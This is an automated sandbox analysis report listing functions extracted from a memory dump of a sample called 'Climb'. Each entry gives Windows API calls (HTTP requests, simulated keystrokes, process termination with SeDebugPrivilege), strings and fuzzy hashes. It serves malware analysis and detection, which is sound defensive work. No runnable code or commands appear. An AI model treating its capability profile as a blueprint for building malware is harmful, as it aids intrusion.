Instruction Fuzzy Hash: 7E318471504604AFEB209B15ECACF697BF9FB64323F104006FE05E61E4D7B5A9489F20

Function 004F2AB0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 004F2AF9
OleUninitialize.OLE32(?,00000000), ref: 004F2B98
UnregisterHotKey.USER32(?), ref: 004F2D7D
DestroyWindow.USER32(?), ref: 00533A1B
FreeLibrary.KERNEL32(?), ref: 00533A80
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00533AAD

Strings

close all, xrefs: 004F2AF4

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: ea61b7eed7291297773c44dd6a97bd952ce3f6d24135f163322c14ef510555c1
Instruction ID: 9763b4cc9a847ba0741329414f6566d4755d41f3e04c64841398bf1d72f7cd65
Opcode Fuzzy Hash: ea61b7eed7291297773c44dd6a97bd952ce3f6d24135f163322c14ef510555c1
Instruction Fuzzy Hash: BAD19D30701212DFCB19EF15C959A69FBA0FF04714F1042AEE94AAB2A2CB74AD53CF55

Function 00568835 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 005689F2
SetCurrentDirectoryW.KERNEL32(?), ref: 00568A06
GetFileAttributesW.KERNEL32(?), ref: 00568A30
SetFileAttributesW.KERNEL32(?,00000000), ref: 00568A4A
SetCurrentDirectoryW.KERNEL32(?), ref: 00568A5C
SetCurrentDirectoryW.KERNEL32(?), ref: 00568AA5
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00568AF5

Strings

*.*, xrefs: 00568AAB

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: 96b8f0f3776298dfe33e9b4ab0555c678185e4081a5b318f3b9235ccb80b6be2
Instruction ID: b7681359277a99b38a9325e4ffa75d1fcd1b6706679ab1864fcde10234281a43
Opcode Fuzzy Hash: 96b8f0f3776298dfe33e9b4ab0555c678185e4081a5b318f3b9235ccb80b6be2
Instruction Fuzzy Hash: E781AE729043059BCB24EF54C454ABABBE8BF94320F584E1EF985D7250DF34E945CB92

Function 005888F9 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 193windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00588992
IsWindowEnabled.USER32(00000000), ref: 0058899E
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00588A79
SendMessageW.USER32(00000000,000000B0,?,?), ref: 00588AAC
IsDlgButtonChecked.USER32(?,00000000), ref: 00588AE4
GetWindowLongW.USER32(00000000,000000EC), ref: 00588B06
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00588B1E

Strings

(\, xrefs: 005889D5

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID: (\
API String ID: 4072528602-3685820393
Opcode ID: 7658a38129e4bbcfdf2841069843f3cbec202e9eef5a89a171a3103d72e89694
Instruction ID: 2b7c506aa5ed66c5c816518a8a20d053ea17a5feacb00a70d9f044dc63696118
Opcode Fuzzy Hash: 7658a38129e4bbcfdf2841069843f3cbec202e9eef5a89a171a3103d72e89694
Instruction Fuzzy Hash: E571BE74600209AFEB25EF95C885FBABFB5FF49310F94045AEC45B72A1CB31A984DB50

Function 004F7447 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 004F74D7

Part of subcall function 004F7567: GetClientRect.USER32(?,?), ref: 004F758D
Part of subcall function 004F7567: GetWindowRect.USER32(?,?), ref: 004F75CE
Part of subcall function 004F7567: ScreenToClient.USER32(?,?), ref: 004F75F6

GetDC.USER32 ref: 00536083
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00536096
SelectObject.GDI32(00000000,00000000), ref: 005360A4
SelectObject.GDI32(00000000,00000000), ref: 005360B9
ReleaseDC.USER32(?,00000000), ref: 005360C1
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00536152

Strings

U, xrefs: 00536021

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 3aa0d1479250b021515ab2145b8d8857d0875f3ad99abeba5cd2eeb3a740c042
Instruction ID: 27c75e2f59194861a080833777c79117a484e1dc68d4a57a0643551f81ce510b
Opcode Fuzzy Hash: 3aa0d1479250b021515ab2145b8d8857d0875f3ad99abeba5cd2eeb3a740c042
Instruction Fuzzy Hash: CF71CF31500209EFCF25DF64C889ABA7FB1FF48320F14866EED559A2A6C7358845EB61

Function 0056CC98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0056CCB7
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0056CCDF
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0056CD0F
GetLastError.KERNEL32 ref: 0056CD67
SetEvent.KERNEL32(?), ref: 0056CD7B
InternetCloseHandle.WININET(00000000), ref: 0056CD86

Strings

, xrefs: 0056CD00

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: dcd93c10d07cfd950d973295c66b9ea92010d0ba4d72da2cb192cf61ccfbed7e
Instruction ID: 7006e1fdefd8c3ca96c59f04d65f161bee660d603a83d3372e01ec0f878a49ad
Opcode Fuzzy Hash: dcd93c10d07cfd950d973295c66b9ea92010d0ba4d72da2cb192cf61ccfbed7e
Instruction Fuzzy Hash: 8A316D71600248AFD721AF658C88ABB7FFCFB55740B10492AF886D7240DB34DD489B70

Function 0055A215 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,005355AE,?,?,Bad directive syntax error,0058DCD0,00000000,00000010,?,?), ref: 0055A236
LoadStringW.USER32(00000000,?,005355AE,?), ref: 0055A23D

Part of subcall function 004FB329: _wcslen.LIBCMT ref: 004FB333

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0055A301

Strings

Error: , xrefs: 0055A2CF
%s (%d) : ==> %s.: %s %s, xrefs: 0055A26B
Line %d:, xrefs: 0055A28C
., xrefs: 0055A2E7
Line %d (File "%s"):, xrefs: 0055A2A7

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 593099f1eda93ba68130344edb39194cb679fee5f4140501e10e2a3f07bc192e
Instruction ID: 60c13b695f70845a0e812c3736779f807e0da56b96fd61cec57f1bc48f9ac25e
Opcode Fuzzy Hash: 593099f1eda93ba68130344edb39194cb679fee5f4140501e10e2a3f07bc192e
Instruction Fuzzy Hash: 9D212F3184021EAFCF11ABA0CC1AEFE7B79FF18704F04445ABA15650A2EB75A658DB51

Function 005529EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 005529F8
GetClassNameW.USER32(00000000,?,00000100), ref: 00552A0D
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00552A9A

Strings

smallicons, xrefs: 00552A62
list, xrefs: 00552A7C
SHELLDLL_DefView, xrefs: 00552A19
largeicons, xrefs: 00552A2E
details, xrefs: 00552A48

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: e6f5fd4b22143e85518cc16b4d2f840f3ff6d8753d79247e646a1fc137e1f9d2
Instruction ID: d41bfcc9ce7364a76a0d98451a282503ee05e5a6f2d578a83818e9fc3cf8ed7a
Opcode Fuzzy Hash: e6f5fd4b22143e85518cc16b4d2f840f3ff6d8753d79247e646a1fc137e1f9d2
Instruction Fuzzy Hash: D0110276288307BAFA246621EC1BDEA3FEDBF56725F200013FD05E40D1FBA5A8485B14

Function 004F7567 Relevance: 13.8, APIs: 9, Instructions: 291COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 004F758D
GetWindowRect.USER32(?,?), ref: 004F75CE
ScreenToClient.USER32(?,?), ref: 004F75F6
GetClientRect.USER32(?,?), ref: 004F773A
GetWindowRect.USER32(?,?), ref: 004F775B

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 33006ca8ae809abebf8cf12050001f9ceac0c60fcaf495bf328df1f9f8de1861
Instruction ID: 3c127840d176a2c5b68394c7e0cfece2b0dfb80a69a4dfb7f11aaed795a081c4
Opcode Fuzzy Hash: 33006ca8ae809abebf8cf12050001f9ceac0c60fcaf495bf328df1f9f8de1861
Instruction Fuzzy Hash: FCC1473990464AEBDB10CFA8C980BFEBBF1FF18310F14841AE995E7250D738A951DB65

Function 0052D210 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0052D237
_free.LIBCMT ref: 0052D2A2
_free.LIBCMT ref: 0052D2C8
_free.LIBCMT ref: 0052D2F1
_free.LIBCMT ref: 0052D329
_free.LIBCMT ref: 0052D35A
_free.LIBCMT ref: 0052D39B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0052D41C
_free.LIBCMT ref: 0052D435

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 5c763ccc71cd35c4e48249e19448b5e55773eb3405bf5ca9123790c00e3974af
Instruction ID: d3c0321659a522624988e383d1888264dc5685f0588dae425875f8244b52099b
Opcode Fuzzy Hash: 5c763ccc71cd35c4e48249e19448b5e55773eb3405bf5ca9123790c00e3974af
Instruction Fuzzy Hash: EC615875904731AFEF25AF74F885AAD7FB4BF53320F54056DE845A72C2DA3198008BA1

Function 00585B72 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00585C24
ShowWindow.USER32(?,00000000), ref: 00585C65
ShowWindow.USER32(?,00000005,?,00000000), ref: 00585C6B
SetFocus.USER32(?,?,00000005,?,00000000), ref: 00585C6F

Part of subcall function 005879F2: DeleteObject.GDI32(00000000), ref: 00587A1E

GetWindowLongW.USER32(?,000000F0), ref: 00585CAB
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00585CB8
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00585CEB
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00585D25
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00585D34

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: d3adeeb01c14d094e1bc94a9c0eadffcc3f20c251ae07a7c730946cdb1e5608e
Instruction ID: a9a3c06df8ee2824e27f6f5fc5c6d48923fb55190338208324ff95e4d57c0a8e
Opcode Fuzzy Hash: d3adeeb01c14d094e1bc94a9c0eadffcc3f20c251ae07a7c730946cdb1e5608e
Instruction Fuzzy Hash: 0D519B30A41A09BFEF24AF24CC49F983FA1FB14764F104116BE25BA1E0E775A984AF51

Function 0056CB88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0056CBC7
GetLastError.KERNEL32 ref: 0056CBDA
SetEvent.KERNEL32(?), ref: 0056CBEE

Part of subcall function 0056CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0056CCB7
Part of subcall function 0056CC98: GetLastError.KERNEL32 ref: 0056CD67
Part of subcall function 0056CC98: SetEvent.KERNEL32(?), ref: 0056CD7B
Part of subcall function 0056CC98: InternetCloseHandle.WININET(00000000), ref: 0056CD86

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 93301e82003d6da002ff0edfe868b2925c2a2a4e0f44669025413e19b1b3c236
Instruction ID: e26e336350177a73eafc44e006965412c2ee0f7cfe22240e60ab9570c6ba4755
Opcode Fuzzy Hash: 93301e82003d6da002ff0edfe868b2925c2a2a4e0f44669025413e19b1b3c236
Instruction Fuzzy Hash: D9317C71601705AFEB219F75DD48A7ABFF8FF54300B04492DF8AA97610CB31E814AB60

Function 00552EEF Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00554393: GetWindowThreadProcessId.USER32(?,00000000), ref: 005543AD
Part of subcall function 00554393: GetCurrentThreadId.KERNEL32 ref: 005543B4
Part of subcall function 00554393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00552F00), ref: 005543BB

MapVirtualKeyW.USER32(00000025,00000000), ref: 00552F0A
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00552F28
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00552F2C
MapVirtualKeyW.USER32(00000025,00000000), ref: 00552F36
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00552F4E
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00552F52
MapVirtualKeyW.USER32(00000025,00000000), ref: 00552F5C
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00552F70
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00552F74

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: fd0c3f8d524551dabd707c840399228c867881447cfdc428fc63e97f159700b5
Instruction ID: 242ff832dc39af341684b35477b7d81a758cd60b5246b4ac0ae77e235cc4f391
Opcode Fuzzy Hash: fd0c3f8d524551dabd707c840399228c867881447cfdc428fc63e97f159700b5
Instruction Fuzzy Hash: B501B5306842147BFB106B699C8EF593FA9EF9DB12F110412F718AE1E4C9E16448DBB9

Function 00552150 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00551D95,?,?,00000000), ref: 00552159
HeapAlloc.KERNEL32(00000000,?,00551D95,?,?,00000000), ref: 00552160
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00551D95,?,?,00000000), ref: 00552175
GetCurrentProcess.KERNEL32(?,00000000,?,00551D95,?,?,00000000), ref: 0055217D
DuplicateHandle.KERNEL32(00000000,?,00551D95,?,?,00000000), ref: 00552180
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00551D95,?,?,00000000), ref: 00552190
GetCurrentProcess.KERNEL32(00551D95,00000000,?,00551D95,?,?,00000000), ref: 00552198
DuplicateHandle.KERNEL32(00000000,?,00551D95,?,?,00000000), ref: 0055219B
CreateThread.KERNEL32(00000000,00000000,005521C1,00000000,00000000,00000000), ref: 005521B5

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 2705b97808a32771bd3649b5cac69bb2ce8376f64eca149d190eacd4dfc1a77f
Instruction ID: fe56910733fcadde880d63939a96b66242ab2941f61f57adafb8b4762dc783de
Opcode Fuzzy Hash: 2705b97808a32771bd3649b5cac69bb2ce8376f64eca149d190eacd4dfc1a77f
Instruction Fuzzy Hash: 8801A8B5240304BFE610ABA5EC8DF6B7BACEB99711F005411FE05EB1E1CA719804DB30

Function 0055CE7B Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004F41EA: _wcslen.LIBCMT ref: 004F41EF

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0055CF99
_wcslen.LIBCMT ref: 0055CFE0
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0055D047
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0055D075

Strings

,*\, xrefs: 0055CF0C
<*\, xrefs: 0055CEF6
0, xrefs: 0055CF5A

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: ,*\$0$<*\
API String ID: 1227352736-1015321224
Opcode ID: e0e67d0d71fb16fc1257c4472df6ebfcf255905afdfddb9b91e6141a4c0d652c
Instruction ID: 62bc48ce1c32decb7ef4f40017c4426ae2c3daa056c771a560f34600ca115249
Opcode Fuzzy Hash: e0e67d0d71fb16fc1257c4472df6ebfcf255905afdfddb9b91e6141a4c0d652c
Instruction Fuzzy Hash: B251C0326043019ED720AE64C869B6BBFF8BF85315F040A2EFD91D21E0EB64C949C762

Function 0057AB3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0055DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 0055DDAC
Part of subcall function 0055DD87: Process32FirstW.KERNEL32(00000000,?), ref: 0055DDBA
Part of subcall function 0055DD87: CloseHandle.KERNEL32(00000000), ref: 0055DE87

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0057ABCA
GetLastError.KERNEL32 ref: 0057ABDD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0057AC10
TerminateProcess.KERNEL32(00000000,00000000), ref: 0057ACC5
GetLastError.KERNEL32(00000000), ref: 0057ACD0
CloseHandle.KERNEL32(00000000), ref: 0057AD21

Strings

SeDebugPrivilege, xrefs: 0057ABEC

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: e6de8a680fda72b5a7c50f5572872a8606d83a126c12519662613a6e0a453337
Instruction ID: 2a417e302c2a4abdbd5f76f5b9f60cea035958575f43efbff4ca9e6f2bc5e994
Opcode Fuzzy Hash: e6de8a680fda72b5a7c50f5572872a8606d83a126c12519662613a6e0a453337
